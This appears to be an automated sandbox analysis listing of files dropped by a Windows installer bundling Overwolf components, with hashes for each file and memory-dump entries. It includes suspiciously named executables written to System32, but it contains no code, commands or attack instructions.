memory/3564-13-0x00007FF9D6320000-0x00007FF9D6DE2000-memory.dmp

memory/1240-16-0x00007FF9D6320000-0x00007FF9D6DE2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g5eiqg0h.3zn.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1240-23-0x000001E2FF720000-0x000001E2FF742000-memory.dmp

memory/1240-27-0x00007FF9D6320000-0x00007FF9D6DE2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\uac.dll

MD5 861f7e800bb28f68927e65719869409c
SHA1 a12bfcd2b9950e758ead281a9afbf1895bf10539
SHA256 10a0e8cf46038ab3b2c3cf5dce407b9a043a631cbde9a5c8bcf0a54b2566c010
SHA512 f2bf24a0da69bbe4b4a0f0b1bfc5af175a66b8bcc4f5cc379ed0b89166fa9ffe1e16206b41fca7260ac7f8b86f8695b76f016bb371d7642aa71e61e29a3976eb

memory/1240-44-0x00007FF9D6320000-0x00007FF9D6DE2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\System.dll

MD5 51bd16a2ea23ae1e7a92cedc6785c82e
SHA1 a9fbaeb9a695b9f2ba8a3ed8f0d95d2bf6a3d36c
SHA256 4dbc79d2b1c7987cc64bb5d014db81bb5108bdd6d8bf3a5f820fac1ded62be33
SHA512 66ffc18b2daf6c4cba01aef0e4af2f006a51aa218eab0f21dc66e47eea0389d2b1748ef0e30d2ec9f0123fd7f38ed3aee964dd6bde5779aaee19ebf55369af79

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\UserInfo.dll

MD5 1dd4ca0f4a94155f8d46ec95a20ada4a
SHA1 5869f0d89e5422c5c4ad411e0a6a8d5b2321ff81
SHA256 a27dc3069793535cb64123c27dca8748983d133c8fa5aaddee8cdbc83f16986d
SHA512 f4914edc0357af44ed2855d5807c99c8168b305e6b7904dc865771ad0ee90756038612fe69c67b459c468396d1d39875395b1c8ec69e6da559fb92859204763e

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\INetC.dll

MD5 87050902acf23fa5aa6d6aa61703db97
SHA1 d5555e17151540095a8681cd892b79bce8246832
SHA256 0ecf8b76a413726d2a9c10213ad6e406211330e9e79cfde5024968eedc64a750
SHA512 d75d3fc84a61887ee63bad3e5e38f6df32446fd5c17bedce3edca785030b723b13134b09a9bbbbaca86d5ea07405b8c4afd524cc156a8c1d78f044a22dee9eab

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\utils.dll

MD5 c6b46a5fcdccbf3aeff930b1e5b383d4
SHA1 6d5a8e08de862b283610bad2f6ce44936f439821
SHA256 251ab3e2690562dcfcd510642607f206e6dcf626d06d94b74e1fa8297b1050a0
SHA512 97616475ef425421959489b650810b185488fcb02a1e90406b3014e948e66e5101df583815fd2be26d9c4d293a46b02ba4025426f743e682ed15d228f027f55c

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\OWInstaller.exe

MD5 d5728a6ad16073a60d48573414164702
SHA1 a17dbae62803c53aa356191e1a6074edfd7c8deb
SHA256 9b997908281feeec1d7bfc36515b939e581eb38e07c4849d24811bb48cc95b3e
SHA512 5608c2a270e07263cb41cddcaad48a348f5c54e10b3bd5e3d1803663fbffeaa0c9abbce8f15f9b5e8f53c84efe870960f25ff4080d38f09463c16dad43aad90d

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\OWinstaller.exe.config

MD5 82d22e4e19e27e306317513b9bfa70ff
SHA1 ff3c7dd06b7fff9c12b1beaf0ca32517710ac161
SHA256 272e4c5364193e73633caa3793e07509a349b79314ea01808b24fdb12c51b827
SHA512 b0fb708f6bcab923f5b381b7f03b3220793eff69559e895d7cf0e33781358ec2159f9c8276bf8ba81302feda8721327d43607868de5caaa9015d7bb82060a0b9

memory/3720-164-0x0000020265290000-0x00000202652DE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\OverWolf.Client.CommonUtils.dll

MD5 9562911e11231c09a4d420378c286f64
SHA1 a093e50dfb3cd7b71265d20c78c6182857ea518f
SHA256 c44259feeeae0f009deeffe5b83ed7e72727b8c409c7b62ef6ecb7b24b78b12a
SHA512 6cc6baeb2ca726856c7ba4cfe5a9bf247584a28470dd0de3794274883693d6a0efe922af492e487beae21b53198413e61596ad0e70d448c92acdb06dd9143e5d

memory/3720-168-0x000002027F7C0000-0x000002027F866000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\CommandLine.dll

MD5 6d11c677cae02caa249a4f7f35fff112
SHA1 b417114c9b95ac2f3a2e9a68bf669f7342cd4cdb
SHA256 dde08c1db1ff43b08c7de59ae14045cb6fec13bec7ac65e142142453b8ab1ad4
SHA512 f992c2ad42372d0981e8512b34516b88c8ecacd89ade1027600ad883a6346c2b9d448fb027d38915b15f15f39c6b7f7d25c9af0c36835ff85224e48034609857

memory/3720-170-0x0000020265690000-0x00000202656A4000-memory.dmp

memory/3720-171-0x0000020200000000-0x0000020200528000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\log4net.dll

MD5 f15c8a9e2876568b3910189b2d493706
SHA1 32634db97e7c1705286cb1ac5ce20bc4e0ec17af
SHA256 ae9c8073c3357c490f5d1c64101362918357c568f6b9380a60b09a4a4c1ff309
SHA512 805cd0a70aba2f1cf66e557d51ad30d42b32fbafcfbc6685ec204bc69847619479f653f4f33a4e466055707880d982eb1574ddab8edfa3c641e51cda950e2a0e

memory/3720-175-0x000002027F710000-0x000002027F756000-memory.dmp

memory/1240-176-0x00007FF9D6320000-0x00007FF9D6DE2000-memory.dmp

C:\Users\Admin\AppData\Local\Overwolf\Log\InstallerTrace_2024-12-02_16-11_3720.log

MD5 ce265b8c496346a53f144d5e6ebe74c9
SHA1 793510078bec8695e0d925fb4227eb07f2dfb3d2
SHA256 366445d8638f1a659137a75f0c63ae1ad81a422be661521da68a78ef550b51ed
SHA512 e7dc18a7efe72032af070ebd092eec51cc7908ae5f8651d016aa5103733f66e850e51c6fafb94adf981110894074518a1bc8d7249aaa0f21ede2cd4729997e2a

memory/3720-180-0x0000020267000000-0x0000020267018000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\SharpRaven.dll

MD5 f2f1cd4e9b1f772b7b7955c3310a126a
SHA1 6ea2b5ee4461053ad353d4826ba61388f98c28fc
SHA256 a8cd61fc4478da0464967f5c74b6ecc6a880e879f49ba552f7c3056d3d0d562a
SHA512 587aec3e0b2c913eb40259928dee536ffdb4f51c693682bf926351c86e1ace020bfff3fd9f279a48ecb0d2a46a460aa5d8adeddb3e268c7a5e5dae220100b66d

C:\Program Files\Node64.exe

MD5 47fe2649cc2325a477fce08731aeb716
SHA1 268abf2cceac62263fe040dc40b8b4b9aa3592da
SHA256 d3808b41fe847339d9d69eaa05a5c7dea072b3e6325127a53b54c0d5e102f49b
SHA512 173bd39f32dc4c95309e8e23a33542f92bb1c22459be30e47b52ab92827f418c7ba59fd9b31606f7f40824366e949e7de89a851d1acb8425bbf7fd607632e0d4

memory/3564-205-0x00007FF9D6320000-0x00007FF9D6DE2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\Newtonsoft.Json.dll

MD5 98cbb64f074dc600b23a2ee1a0f46448
SHA1 c5e5ec666eeb51ec15d69d27685fe50148893e34
SHA256 7b44639cbfbc8ddac8c7a3de8ffa97a7460bebb0d54e9ff2e1ccdc3a742c2b13
SHA512 eb9eabee5494f5eb1062a33cc605b66d051da6c6990860fe4fd20e5b137458277a636cf27c4f133012d7e0efaa5feb6f48f1e2f342008482c951a6d61feec147

memory/3720-210-0x000002027FE80000-0x000002027FF30000-memory.dmp

memory/2164-209-0x0000000000BF0000-0x0000000000C52000-memory.dmp

C:\Users\Admin\AppData\Local\Overwolf\Settings\SettingsPageBasic.xml

MD5 ea894da174415741562988d1d8d72054
SHA1 4f8457032165f0af6aa19f54f8bad3246c5cbc2b
SHA256 bcb40a57a732e84f4917cc4433ccf7883254589f5c6ec84e39549037dc145d31
SHA512 39452cc4db55bb62a1ec412b8641f5e8d24a70db7c21c47b154d69e89cc9580e78b8a489c2ce70bdb70bbabb9c3c08ae62c5a3c933dbcd41c6dde54bbca17367

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\manifest.json

MD5 b22a7aee785fd57c82dd5f7f76a0b300
SHA1 97528822fed8e42faa0de1f4d4c3de61cc6ce1e3
SHA256 53faf2f62e7aa22b60bc926803461213ce4230e114fce86acfe5cfd720f1dfb4
SHA512 4c66855ae30762b53f6f31bcfd3a24183614f8be716dc08180d5df2c71729ff0f1957ab04fc43b70e73c7e95511143e42dfde8150d2feb758804fecb12dd877d

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\images\icon.ico

MD5 d7ebedbbf70c4ac7b2eac703d6eaa9a2
SHA1 d801b06a5b45a0633307d0b865f61b1cd07dea13
SHA256 e1f71c3c13bbb8c5ce30d97bbebe991a20376698a82fadfcd4091f0d31326dad
SHA512 9ca720402a13f55accda5a586f150dd48faede2f310d9726559c9d1ddc2ad7e0fed957874950ebd305d6be7102302dce4cf2f6e6909431d557aa8992714585bd

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\index.html

MD5 c7b752acf6d1e10f3aca2c67b1ccf4d3
SHA1 ab793cb43e0c2b5af0fdcbf90d0d29d5d3e164f7
SHA256 69b9f99f6611f953d94984ac35bdaf9e9817f689e1e3614976bebe3465c613fc
SHA512 120addd79b7ade4f35b426c02631c8167d81080fde30a01b989453113f7547784e525d53bede41ede0c9b3caca8513060753ba51f75bf6936d32ee597d642576

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\libs\jquery-1.10.2.min.js

MD5 44e3f0db3e4ab6fedc5758c05cf27591
SHA1 2d408aa1d35661019c95adcc60b78c0727ed25b4
SHA256 bc44d3631ffef1df7960e359f02002d3ada45ee05205c2cf1edd85da2f518144
SHA512 4d4844e53e686fc59a52e86588f328dca3ed6fdad7195c58942a98c51755a24981b903ee7c7b27785375eaad5a7d9501cf74b999674b79f214e66103bad9efdc

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\libs\cmp.bundle.js

MD5 deb60b40df89edecd35ea3d1410ef7a6
SHA1 9899f48d1b29c6a51e4b80ce0579ec4f51b72c74
SHA256 2eed337a035bfcba83bdf00686f236319bfdcdc5c5b4d57541cf855bfe4fd67a
SHA512 484daa9e6423c4aa90b310f7c957f850109afd4ef30ff0dc57e05d7ea30f9ae12dbed862197ac9f1ee99b26a7204ba14d1a95d8a8a6f5064a825e5d861fb8705

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\windows\cri\template.js

MD5 76c1ef0cb437db144c2bed53a5a8a5d7
SHA1 aaab8fff649f8e46d1e9510018118ee9abe01498
SHA256 505d3c4de7d9cf8f0155b5b1a3c8792bc0ca2eda6781b441bd85455f144be22e
SHA512 822bf9feda91c89539d263c6c9053163e8dfa3c511195bc61a9b608b4687fb4048733323f03dd30a7ab661a4be4acf6c8d8ae7bb6723771122540a9551899c3e

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\windows\modal\modal-controller.js

MD5 b04bdfd1c7d09bdbdb94a2455fdd677b
SHA1 f000ba4866ff16d75bfd6cf446763498e19b12b1
SHA256 4565ee81ffe222b31982088b1c18850076e3acf59198ebce08118e12cbd87ea1
SHA512 3cb6ef0a16309046e7f407e7321eb12212b0eec09ec1a04b1d813f6c7a04546714865c3b398a93985041f598156ed905ebd23a64260801281b29ada9bc19ec5c

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\windows\settings\template.js

MD5 28513de0830383a516028e4a6e7585a0
SHA1 d31fc3a6f4a3ce6c4afb82ff2342a1ed718809e5
SHA256 8014a7c919da249ba2f2196d9c9b62639d20851be426f3ffaef161cbe477c45f
SHA512 0f7321c2ae13145bb694368dae1b74e6fe20e6b09712da2178bc46e6aa65223ab84c38abbf0ed074c85b42dba1a238a5f3f8d1ae060a0af6df748c5befe11b61

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\windows\welcome\welcome-controller.js

MD5 50f676754862a2ab47a582dd4d79ecf3
SHA1 1cb2f4b11f9f8cfc8dc57ff29d0256dec4811158
SHA256 6155691dbdd66290109afb91617f9cf68af6bd912991d5d27b922f5faa7f530b
SHA512 ccfc89e08fd36f0a694fcda17efb84ca285b6c62afe2e3a794fdad19b6882a4b618645f4d9171673ba56fb4c55fce336d6b8d26dec3a5cc11293ae2b211f499f

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\windows\welcome\template.js

MD5 17f54fca6723b983875d940d931e0afb
SHA1 01774cd5cea36bd74c80a708d6f77567e8091024
SHA256 42c546e9da748ef76fdab56b96fd511eb607617a9ba37b3dc420148b769d8acb
SHA512 401df9a54cd14c19227d91bd08b4775a7b437644b4ca0d1d636d3e07b04591f9c5516e80040ae6a79ba400457d15e3d80aa148a63de870a64664fc5a02f7a038

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\windows\cri\cri-controller.js

MD5 4e4b4a9e2d86ae3c108105078db6d730
SHA1 826946be793c999316af6c1db10523950b18ea2c
SHA256 cee7fc5a36a01a439125be031923d7e7415ec56194255048098169a0108034b7
SHA512 1420065cd000ce9b9c39d27b5dc5f4055f67146e06573a03184649851c9745f0c0af2b5e35b41b5923703dd74e32f9ed95fc59a43db25f854584e319950beffe

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\utils\modal-events-delegate.js

MD5 117e4fdbdb0ecf211c8bd909efd337d1
SHA1 9f8684d856b7c95bdffb139217dfd89f41373187
SHA256 267661f932a2ea78d8c7a98cc03d1b18d7cb8132deb84636772ecd1fcfbe4857
SHA512 f474ee20b59d3d0c11f9f6aee6b6e2b66f7025beaec9841f88455e60533dc96cb4e27910be0dae92b0028c5578932b7f459fdb91d594ad010f72a3b3af6addb1

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\models\notifications.js

MD5 911451f65b2503d23bc27c6a6aa6af72
SHA1 01d3654b23ef7f5adeb4097bd851e8c100a7b2ab
SHA256 c32495d55eed52f47dc7268eeccb90fb6bdc5686135ed089416c6bb8f703a578
SHA512 06edaebb0bb2980a7b6d6baa31a9c0894a9bb5f14a91468ffb8f182d98f04bb811df2a4c37f0b56d612603528aa21f390eaa7cf885874ae770a24dce2f9b249c

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\utils\cookies.js

MD5 6c60e675f8c8c68c0174b644d3a63a2a
SHA1 3635a3fe07ccc4a6f33a986ddb690522d0611abb
SHA256 9d3cb3822e20d6f5157faa02dc69bdaef44576c3fb5523e00aa152107ce30287
SHA512 1dc9ec7b139bcf37107ecd673c01e4fcc606332ea1645a4a1b4e5d95f817d4c99d5964cd3d941a6a526689341d9623b17b4efc002cdf4c73404299d52b1be452

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\utils\commands.js

MD5 186f2a801c3d12b8b53e4b8f0510bd35
SHA1 567932df79e60d27d62752b1a1d72d6bf386c6b0
SHA256 bd6e86d0e6b33a44a1617458f0adff34a5cb0fc52568e03e5d74b8c72b5f379e
SHA512 eb87666e8fb40f81d9f14f61a6cffdba57edce1ab9b62c1df3ea3ffb0f96747f90465b2bee956c096f3762d25e90f5f130537046d8deba388d183cee1cc473c3

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\utils\analytics.js

MD5 525281e9959af4c1c0d11b9243c798a1
SHA1 237a84c5b57bd132f48446d718b20640cb28c263
SHA256 c37f0699cf8ba7d9e3e0f73f1b2af65f4bdc2a31f44594ffc8c73e98b6c2fd1d
SHA512 fe5bafda7773e69c65dd63270e0306abcd39cb2d886b675ab8c714ae0833efde963b69623d468551a1ab37f1db1a1d457f1568f7a29d9cf0bb23bb0edcab5fc4

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\utils\utils.js

MD5 a0952ebeab701c05c75710c33d725e7e
SHA1 1da8a2e889f1213d481ae3cd5571670c01e64adc
SHA256 b4f0c48cbfeaf8141fd44b12031e3f0410cb0cdc313888ffdb14fdf1d2341246
SHA512 5e5ae616d3fded7d2bf47a326242c4477ca3119fb52897bfb41de0be230ccbd6c3da2c00268b3973e9bf7b4f2886aba64fd9719b448662e4130ee66d87913389

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\utils\strings-loader.js

MD5 9c94eb933d8a43dd3825e67a7e30c980
SHA1 7ec7b16af6f399219209ba5967d377040486a11b
SHA256 96445709fde2613af50f4b8908296d4bfccdccb2d9db9febc34a9bf4dcc70ecf
SHA512 a662a299e31633f71a9b9675970359430fdac06dcc284fd7ce92919f244c7f921639f97a42356e993a95865e6c9f198dcba82c126f82065bf2009a31ec9b02f5

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\block_inputs.js

MD5 b5b52c92b90f4283a761cb8a40860c75
SHA1 7212e7e566795017e179e7b9c9bf223b0cdb9ec2
SHA256 f8dbd6793b35f7a26806f4dabad157aaafdf6d66fad094b50c77d60f223fd544
SHA512 16ad53ede5424ca1384e3caea25225589e9eec9e80e2d845948802db90fad222f709a7b651cd7601a34ba67a0627433f25764638fd542cbd4612871308e7b353

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\windows\progress\template.js

MD5 92b145e6649ba0add3dee9a69d3fa91e
SHA1 4db1a45392ec973cc8a7eecf3a30a9a7ecc7a64d
SHA256 a7128a08bca53dd919cab3e5cb4dab31ded7ae2dafc957209b9fdd23f3b944ab
SHA512 747a087dffdba5c92d9f4c8923615d388b9c4c79d3b71d3cb90487aa37c132290a4f5107eef3055c03eadcb9614e20d4655393dc9251fab7e0ee2438f0d95751

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\windows\privacy\privacy-controller.js

MD5 15bbec339f5046f525e3aa96d36c30ec
SHA1 f73d40bf06584737fe327f1eec6f4b0446545226
SHA256 14d9c60cd97f18e74fee2dd80b6a190eaccc526085991f356feb6b4d330a0fc3
SHA512 2b0edfd2d5efb3f739e56eb6f3bcfae4789af3e1639f5f8e5f7530f5af10eb1a61464d665c9d9b2f4eb3796f2445108599d8bea75f1709aa562feebee519da4e

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\windows\privacy\template.js

MD5 cf8d2c26520d7c84e560dfa79e31dcd3
SHA1 716f2ec17480d5cc9c145bc147833fbfc39d36f0
SHA256 95c459eae0edccdb94702aea603a097e461daa0e5f37dcd0e30de7df665433a8
SHA512 d466dcf7e86a4295857020feea281fc89f519f6bf1e79c3b5e1046d0745c9c9010377b1941e06c9a9b2c78a4173ed9909332d5d6c39b05f460e8a863086c895b

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\windows\progress\progress-1-controller.js

MD5 82f0b997ed552c52a510a9f2ab29dc3a
SHA1 92aec3a656053c71eccdde610130f5d8008fa96f
SHA256 838bab990ce38372dfedb50eb0a270db705811729630ab8557c08bd1e9e8e105
SHA512 ecf67f877002d746eff8af3a50155aa381513ddafd17b6bff0188c85f0765579fea0112e82e1371f962b1f5decc94b65e6120f21fb516533dac35a2d541065bf

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\app.js

MD5 de88fce9253d26e0c61daa1783baa775
SHA1 07c5848354a247056baad369059aac9d3c940ecc
SHA256 993f140f9f4e5cdbdcc657a3c159328bf58b3483dbc27c451516a556763a79ba
SHA512 71ddd47ef7ed7c02fb31e8ffa2ea6d1b5178dbda2ab37bac208e088c8ba2127e0cf5eaa74ee7ad5809fa69e534853312c6c8775c68aeda63bf0e4a5caefa39b7

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\windows\finish-with-recommended-app\finish-with-recommended-app-controller.js

MD5 eb6d6bd7e05d4477e2704dd87b57ca35
SHA1 f42672ec1e23a3f4bcc2952746d87ba8deff44be
SHA256 5ca97132a258ed1f36e401d70ccb95be2c9e18395e6010c40f61172914477de5
SHA512 1402d611f910cf5078e804175fa4693b591348d3e7cf6d0a6bbe026c259eb9e0bc285233c80cb2f4690674c3e927bc72fbdcbe758826b98fd02ecb3ed82e339a

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\windows\finish-with-recommended-app\template.js

MD5 d1cb34b57cef7e28b9286454b197b712
SHA1 f3a964b319bab82d4eda07e126bbfd6dec35c349
SHA256 b61dfc304b46e8cd95d7b15bb93c6160b30523a1a093397a84fc8b8bed00ac42
SHA512 3a07de9c58134edbb7998f85e6d037a0cd066e32c4daa07594a949a7574f5693153bbcdb59739e1a92e847ab1128e2369fb30ba76a7b9cdfa9a37a409db691c1

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\windows\finish\finish-controller.js

MD5 138240ea22084428e9e25583e9156568
SHA1 e8bef7eab5b6e7040b996ec9504436e073444bd9
SHA256 4cb4e1aa25c15ae5f2e63fa4658a8acff0ce63e0f59cb6eb634df2dfe336e2ec
SHA512 e97b81b0ecd964e6e909019353efe4f5582f65763ac4197d754f1c4eea19cfc249900ae597fd33e29f531bb0d1c7e0f010793c59a2b0099fa75ad0b7d01ce8a7

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\windows\finish\template.js

MD5 f092de7ea66d8e920b345f38537fa35d
SHA1 82d107a409f18878307ae0cefe24074db64937c4
SHA256 b05f111369e12ecb4cdc6526dd554061eb31097aa0de4bd126ddc185b69d922f
SHA512 14942c0122f216c07595cbaae498f9c4d37a2d0fd95f262c332502befdf4566c7a042c4d85702c1d82a111123dde677096195e9efeb1d74eb1dfd4df84d01a23

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\windows\main\main-controller.js

MD5 15b665a5c915004e1aa7e9e11a710f7e
SHA1 7821924e42bb19d60c572ff80bbaaa04d7aaeefb
SHA256 84dc33e2eb3118fc77a38b0ca53af42c53f6eb85cfb1e8737dbe39fa03515653
SHA512 dd47f7bac0dbaac714e6d2fc91b4c24756ca4acb70bdbc4b54cd5216552d6bb85ba2e1c3c8445c5fb40d116dfab6569945cd74730bb7c8f3cf46e8d08f8afa02

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\windows\main\template.js

MD5 a118c7724c208f12083240cafccfd10b
SHA1 f89c676a215b869626737862a08c9eb07d440211
SHA256 63a43bb08403972d0f4b0e381bd264af14e826e0035242bc1baa9a815956b8fc
SHA512 9fede79044ae5de7baf5bfba0d5a515ce462a25420026ff45bcf1751e57510023cb40df42d08e880114f62b38ddb218355d5357b725df32a41ae4e6a18414cb3

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\windows\settings\settings-controller.js

MD5 378c18dd7d5cee6ca7c4ddd0396b535b
SHA1 d5f81d4fab29201fd1629dc4d8e6f918c0c30479
SHA256 b5c5dc5e0684fd97eb4c45896dc1c2de8a6a6fdc63b6aa83a99103c15787ef35
SHA512 c29416b3f0245f4826d857dc8c52c969071d2410c945bda96f38f59a9bc7137ee534d84865e5ac55a1e3cea6bb705c5d592725af709cd97e7f38ff05dbaafe5b

memory/3720-265-0x0000020A80710000-0x0000020A80EB6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\assets\fonts\lato\LatoLatin-Regular.eot

MD5 6cfad5881181ae658a6efdd68889a690
SHA1 5b54f6ccc20ed3a078fbdf94d7a68ac80002624d
SHA256 c6c970b103b3c3aa83f7a45172619a4451ea5f015f9f3ef4fd08c9a4aa895cbc
SHA512 ddd3d43540eb3d4eef48d0834136de1e7bf23a52f286d0a666cf57c7d685aadf1cea6d37c88f9d7ce5ad6143d7c3213f54b16a11f616b7dce154bba50997bbe7

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 3eb3833f769dd890afc295b977eab4b4
SHA1 e857649b037939602c72ad003e5d3698695f436f
SHA256 c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512 c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6a807b1c91ac66f33f88a787d64904c1
SHA1 83c554c7de04a8115c9005709e5cd01fca82c5d3
SHA256 155314c1c86d8d4e5b802f1eef603c5dd4a2f7c949f069a38af5ba4959bd8256
SHA512 29f2d9f30fc081e7fe6e9fb772c810c9be0422afdc6aff5a286f49a990ededebcf0d083798c2d9f41ad8434393c6d0f5fa6df31226d9c3511ba2a41eb4a65200

memory/3720-279-0x00000202012B0000-0x0000020201A1B000-memory.dmp

C:\Windows\System32\$Node32.exe

MD5 b850f016450d68da0ae4bb945355f70c
SHA1 521726c38af715e6ee1c76315151f0ed9518c6f4
SHA256 8a649909d1defa1b8966cde6ad854f3cbf7662a732cf1a16b853c793cf240d24
SHA512 30f152e08ba44308da9b9c42951e45a9b6c2ad808c3a426da4af0384939816e04f1faf38de1d3c404e515d90b2e2eaeabe152b0151fb3f21c6a00bd2fdac3b6c

memory/1300-399-0x000002A4E1260000-0x000002A4E1261000-memory.dmp

memory/1300-398-0x000002A4E1260000-0x000002A4E1261000-memory.dmp

memory/1300-397-0x000002A4E1260000-0x000002A4E1261000-memory.dmp

memory/1300-406-0x000002A4E1260000-0x000002A4E1261000-memory.dmp

memory/1300-404-0x000002A4E1260000-0x000002A4E1261000-memory.dmp

memory/1300-410-0x000002A4E1260000-0x000002A4E1261000-memory.dmp

memory/1300-408-0x000002A4E1260000-0x000002A4E1261000-memory.dmp

memory/1300-409-0x000002A4E1260000-0x000002A4E1261000-memory.dmp

memory/1300-407-0x000002A4E1260000-0x000002A4E1261000-memory.dmp

memory/1300-405-0x000002A4E1260000-0x000002A4E1261000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1bb3948f455f76085a320e6ecf3b884d
SHA1 9b3629bb1814ebd5d6143eaee9a7447767974b5f
SHA256 ab7956ac7fb0780b1c36bdd9f1574e9d6a75eb8a84e4db0d5a19bc4101cc44a0
SHA512 17f0324dbf79462f1d4da9ccec167289e719595dc82afeae05b0a1309b5ce5e7c446dbace832db3642fac07896bee80714cd893dc0c9b48b7fbec38c91363f6b

C:\Windows\System32\$Node2Json.exe

MD5 41814c2aa6f0aaffaaaa26ffd07b3550
SHA1 ea9731c42a382ed003b5b4bfd28c3ba437c8d14a
SHA256 da2926ac30bda874255c093b58a8a4efa4b8e7872393ea4a242f17a4e3ab014e
SHA512 f2513d8e10536bd747dd1ec4a6aa9ec0007ea9a4484c364b2cf9d5ffd42cf3bcd0e346040d4c34c3dba28a208752b82c41bdae2a9dd88ebc1ba869cd1907877d

memory/2004-461-0x0000000000830000-0x0000000000852000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e2844b0cc903fcf9cb8f75bbb2c74293
SHA1 61dd6066b0f4ac530680955ebdb0a85891d7e874
SHA256 b525765eef8dcc4c01eab3e0781c66ddd59526bb27d2d85bdd12555bb66e6187
SHA512 0d68c027296e019ee580e8d523f335be52dead99cd1c66331fc4c853037c271d9a50ad31eb07b6344aab9e5baae37fac868bbd0497184a8b46dd9ab30c6c6497

C:\Windows\System32\$Node3Json.exe

MD5 391d4f99d0076ce566b370f1572ef670
SHA1 0bf04beb77440315098bacf30563a6542e254a45
SHA256 b55dbc5b3437654eca9fd1ea4826f81bde74af9e0c69109c25188461eb6a3605
SHA512 1952fa90fc139863381c15f424a8146335cbbc6f443efcdffc502f1064889a244fa7da1b30ebd4c9b2bec15fd55d367a2aa80afd576b1e2c4baed40ffec76497

memory/3140-491-0x0000000000AD0000-0x0000000000AF2000-memory.dmp

memory/908-493-0x000001F527610000-0x000001F52763A000-memory.dmp

memory/908-494-0x00007FF9F47B0000-0x00007FF9F49A8000-memory.dmp

memory/908-495-0x00007FF9F2BA0000-0x00007FF9F2C5D000-memory.dmp

memory/620-499-0x0000000140000000-0x0000000140008000-memory.dmp

memory/620-498-0x0000000140000000-0x0000000140008000-memory.dmp

memory/620-497-0x0000000140000000-0x0000000140008000-memory.dmp

memory/620-496-0x0000000140000000-0x0000000140008000-memory.dmp

memory/620-503-0x0000000140000000-0x0000000140008000-memory.dmp

memory/620-504-0x00007FF9F47B0000-0x00007FF9F49A8000-memory.dmp

memory/620-505-0x00007FF9F2BA0000-0x00007FF9F2C5D000-memory.dmp

memory/620-506-0x0000000140000000-0x0000000140008000-memory.dmp

memory/624-510-0x00000251F5C30000-0x00000251F5C5A000-memory.dmp

memory/624-517-0x00007FF9B4830000-0x00007FF9B4840000-memory.dmp

memory/624-516-0x00000251F5C30000-0x00000251F5C5A000-memory.dmp

memory/624-511-0x00000251F5C30000-0x00000251F5C5A000-memory.dmp

memory/624-509-0x00000251F5BA0000-0x00000251F5BC5000-memory.dmp

memory/676-527-0x00007FF9B4830000-0x00007FF9B4840000-memory.dmp

memory/676-526-0x000001D51FE00000-0x000001D51FE2A000-memory.dmp

memory/676-521-0x000001D51FE00000-0x000001D51FE2A000-memory.dmp

memory/956-531-0x0000028338BD0000-0x0000028338BFA000-memory.dmp

